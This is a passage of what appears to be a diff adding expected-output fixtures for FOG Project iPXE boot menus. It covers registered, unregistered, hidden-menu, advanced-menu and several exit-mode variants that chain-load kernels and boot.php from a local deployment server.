+echo Memtest needs memdisk, which is x86-only -- it cannot run on 64-bit ARM.
+sleep 5 || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel arm_Image loglevel=4 initrd=arm_init.cpio.gz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch arm_init.cpio.gz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## debug-requested ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+item fog.debug Debug Mode
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.debug
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=onlydebug
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## registration-disabled ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## advanced-menu ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.advanced Advanced Menu
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.advanced
+chain -ar http://10.0.0.1/fog/service/ipxe/advanced.php || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## advanced-menu-login ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.advancedlogin Advanced Menu
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.advancedlogin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param advLog 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## hidden-menu ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+iseq ${platform} efi && set key 0x1b || set key 0x1b
+iseq ${platform} efi && set keyName ESC || set keyName Escape
+prompt --key ${key} --timeout 3000 Booting... (Press ${keyName} to access the menu) && goto menuAccess || console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82
+:menuAccess
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param platform ${platform}
+param username ${username}
+param password ${password}
+param menuaccess 1
+param debug 1
+param sysuuid ${uuid}
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params
+
+########## hidden-menu-keyseq ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+iseq ${platform} efi && set key 0x1b || set key 0x1b
+iseq ${platform} efi && set keyName ESC || set keyName F12
+prompt --key ${key} --timeout 3000 Booting... (Press ${keyName} to access the menu) && goto menuAccess || console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82
+:menuAccess
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param platform ${platform}
+param username ${username}
+param password ${password}
+param menuaccess 1
+param debug 1
+param sysuuid ${uuid}
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params
+
+########## hidden-menu-accessed ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-sanboot ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-reboot ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+reboot || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-exit ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+exit 0 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-grub ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+chain -ar ${boot-url}/service/ipxe/grub.exe --config-file="rootnoverify (hd0);chainloader +1" || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
